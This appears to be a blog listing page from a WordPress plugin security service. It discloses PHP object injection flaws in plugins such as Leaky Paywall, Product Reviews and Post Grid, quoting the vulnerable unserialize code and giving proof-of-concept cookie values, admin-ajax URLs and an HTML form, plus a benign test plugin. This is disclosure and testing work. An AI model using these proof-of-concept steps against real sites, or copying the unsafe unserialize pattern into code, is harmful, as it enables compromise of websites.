17 Aug

PHP Object Injection Vulnerability in Leaky Paywall

We recently started proactively monitoring for evidence of some high risk vulnerabilities when changes are made to WordPress plugins and if we had more customers we could expand the proactive monitoring to more types of vulnerabilities. One of the types of vulnerabilities we are looking for are PHP object injection vulnerabilities since those are likely to be exploited if hackers become aware of them. Through that we came across a PHP object injection vulnerability in the plugin Leaky Paywall, which permits implementing a paywall on a website.

That a plugin used for business purposes has a serious vulnerability is all too common in our experience and is good reminder of the value of getting a security review of plugins that business can make a lot of sense. Through our service, paying customers can suggest and vote for plugins to have a review done. We also recently introduced the option to purchase the same type of review for a plugin of your choice.

The plugin makes the function process_cookie_requests() available through WordPress AJAX functionality whether the request comes from someone that is logged in to WordPress or not (/include/class-restrictions.php):

11
12
add_action( 'wp_ajax_nopriv_leaky_paywall_process_cookie', array( $this, 'process_cookie_requests' ) );
add_action( 'wp_ajax_leaky_paywall_process_cookie', array( $this, 'process_cookie_requests' ) );

In the process_cookie_requests() function, if the cookie “issuem_lp” exists its value would be unserialized, which permits PHP object to occur:

59
60
61
if ( !empty( $_COOKIE['issuem_lp'] ) ) {
	$available_content = maybe_unserialize( stripslashes( $_COOKIE['issuem_lp'] ) );
}

There was similar code in the function process_requests() in the file /class.php, which may also be vulnerable.

After we notified the developer of the issue they released version 4.9.2, which resolves the vulnerability by replacing the usage serialization and unserialization with JSON encoding and decoding.

Proof of Concept

With our plugin for testing for PHP object injection installed and activated, set the value of the cookie “issuem_lp” to “O:20:”php_object_injection”:0:{}” and then when you visit the following URL  the message “PHP object injection has occurred.” will be shown.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[valid post ID]” with the ID number of a valid post.

http://[path to WordPress]/wp-admin/admin-ajax.php?action=leaky_paywall_process_cookie&post_id=[valid post ID]

Timeline

  • August 10, 2017 – Developer notified.
  • August 15, 2017 – Developer responds.
  • August 17, 2017 – Version 4.9.2 released, which fixes vulnerability.
31 Jul

PHP Object Injection Vulnerability in Product Reviews

We recently started proactively monitoring for evidence of some high risk vulnerabilities being in WordPress plugins when changes are made to the plugins. One of the types of vulnerabilities we are looking for are PHP object injection vulnerabilities since those are likely to be exploited if hackers become aware of them (unlike other types of vulnerabilities that security companies are known to overstate the impact of). Through that we came across a PHP object injection vulnerability in the plugin Product Reviews.

The plugin’s function EWD_URP_Update_Karama() is made available through WordPress’ AJAX functionality to those logged in to WordPress or those not logged in (in the file /Functions/Process_Ajax.php):

79
80
add_action('wp_ajax_urp_update_karma', 'EWD_URP_Update_Karama');
add_action('wp_ajax_nopriv_urp_update_karma', 'EWD_URP_Update_Karama');

That function takes the value of the cookie “EWD_URP_Karma_IDs” and unserializes it, which would allow PHP object injection:

62
63
64
65
66
67
68
69
70
71
72
73
74
function EWD_URP_Update_Karama() {
    $Path = ABSPATH . 'wp-load.php';
    include_once($Path);
 
    $Review_ID = $_POST['ReviewID'];
    $Direction = $_POST['Direction'];
 
    $Karma = get_post_meta( $Review_ID, 'EWD_URP_Review_Karma', true );
 
    if ($Direction == 'down') {update_post_meta( $Review_ID, 'EWD_URP_Review_Karma', $Karma - 1 );}
    else {update_post_meta( $Review_ID, 'EWD_URP_Review_Karma', $Karma + 1 );}
 
    $EWD_URP_Karma_IDs = unserialize(stripslashes($_COOKIE['EWD_URP_Karma_IDs']));

The unserialization of that cookie also occurs in the function EWD_URP_Display_Review() in the file /Shortcodes/SelectReview.php.

We notified the developer of the issue a week ago and haven’t heard back from them and no changes have been made to the plugin. We notified them of a less serious vulnerability in another of their plugins a month and half ago, which still hasn’t been resolved.

If you were using our service you would have already been warned about the vulnerability in the other plugin if you were impacted and would be notified shortly about this one as well as having us available to work with you to decide how best to protect against it.

Proof of Concept

Make the object to be injected the value of the cookie “EWD_URP_Karma_IDs” and then visit http://[path to WordPress]/wp-admin/admin-ajax.php?action=urp_update_karma (Make sure to replace “[path to WordPress]” with the location of WordPress).

You can use our PHP objection injection test plugin to make testing this proof of concept easier.

Timeline

  • June 24, 2017 – Developer notified.
25 Jul

Vulnerability Details: PHP Object Injection Vulnerability in Referrer Detector

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP objection injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

25 Jul

Vulnerability Details: PHP Object Injection Vulnerability in AJAX Random Posts

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP objection injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

25 Jul

Vulnerability Details: PHP Object Injection Vulnerability in SiteBuilder Dynamic Components

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP objection injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

25 Jul

Vulnerability Details: PHP Object Injection Vulnerability in My Geo Posts Free

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP objection injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

25 Jul

Vulnerability Details: PHP Object Injection Vulnerability in Gravitate QA Tracker

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP objection injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

24 Jul

Vulnerability Details: PHP Object Injection Vulnerability in NextGEN Gallery geo

A month ago we discussed the web hosting company Pagely’s discovery of a number of PHP objection injection vulnerabilities in WordPress plugins. For some reason the unfixed ones have remained in the WordPress Plugin Directory despite being reported to the people running it. We recently took a closer look at those vulnerabilities while improving our detection of this kind of vulnerability for our new ...


To read the rest of this post you need to have an active account with our service.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

24 Jul

WordPress Plugin for Use in Testing for PHP Object Injection

Last month we introduced something new to our service, we are proactively monitoring changes to the WordPress plugins to see if they include some easy to spot vulnerabilities in them. We currently are restricting that to the most serious vulnerabilities due to amount of time it requires to do even that (if we had more customers we could justify expanding that further). One of the types of vulnerabilities we are monitoring for are PHP object injection vulnerabilities, as that is something that we have seen hackers exploiting on a fairly wide scale in the past. That has lead to us having to review more possible instances of that type of vulnerability and that in turn lead to us coming up with a simpler method to test if there is in fact an exploitable vulnerability. Seeing as this type of vulnerability looks to be under-noticed and our solution is so simple, we decide to share it.

The first part is a plugin, which can be downloaded here and then installed in the root plugin directory, /wp-content/plugins/.

The code in that is the following (we said it was simple):

<?php
/*
Plugin Name: PHP Object Injection Test
Plugin URI: https://www.pluginvulnerabilities.com/
Description: Allows for easy testing of PHP object injection vulnerabilities. Displays message "PHP object injection has occurred." when "O:20:"PHP_Object_Injection":0:{}" is unserialized.
Version: 1.0
Author: White Fir Design
Author URI: https://www.pluginvulnerabilities.com/
License: GPLv2

Copyright 2017 White Fir Design

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; only version 2 of the License is applicable.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/

class PHP_Object_Injection {
   function __wakeup() {
		exit('PHP object injection has occurred.');
   }
}

?>

The first part of the plugin’s code is the file headers needed to allow the file to be recognized as a plugin and then it defines a class “php_object_injection”. When the plugin is active and the PHP object

O:20:"PHP_Object_Injection":0:{}

is unserialized the  __wakeup() function in the class will run. As the code is written that will cause the script to stop running and the message “PHP object injection has occurred.” to be shown, indicating that PHP object has occurred. You can change what the __wakeup() function does to something else, say have it log certain data at that point, depending on your needs.

If you find a PHP objection vulnerability in a WordPress plugin (or any other vulnerability in one) we would appreciate if you let us know that so that we can add it to our data set.

09 Jan

Vulnerability Details: PHP Object Injection Vulnerability in Post Grid

Back in November we were contacted about a PHP object injection vulnerability in the plugin Post Grid that the person who contacted us had seen exploited. We didn’t include it in our data at the time since they said they were waiting on the “developer to respond etc.” before disclosing it. While looking in to that vulnerability we discovered a file deletion vulnerability in the plugin, which impacted all the version that also had the PHP object injection vulnerability, so anyone using our service or the free data that comes with its companion plugin would have been notified that they were using a vulnerable plugin at the time.

Recently the issue of the vulnerability came up again and we noticed that it still hadn’t been disclosed. Seeing as it has now been two months since it was fixed we will go ahead with the disclosure.

As of version 2.0.11 the plugin made the function post_grid_import_content_layouts() available through WordPress AJAX functionality to those logged in to WordPress and those not logged in:

660
661
add_action('wp_ajax_post_grid_import_content_layouts', 'post_grid_import_content_layouts'); 
add_action('wp_ajax_nopriv_post_grid_import_content_layouts', 'post_grid_import_content_layouts');

That function passes the value of the POST input “layouts_data” through the function unserialize(), which allows the possibility of PHP object injection to occur:

639
640
641
642
function post_grid_import_content_layouts(){
 
	$layouts_data = stripslashes($_POST['layouts_data']);
	$layouts_data = unserialize($layouts_data);

Proof of Concept

The following proof of concept will cause the specified object to be injected.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[Object to be Injected]” with the object to be injected.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="post_grid_import_content_layouts" />
<input type="hidden" name="layouts_data" value="[Object to be Injected]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>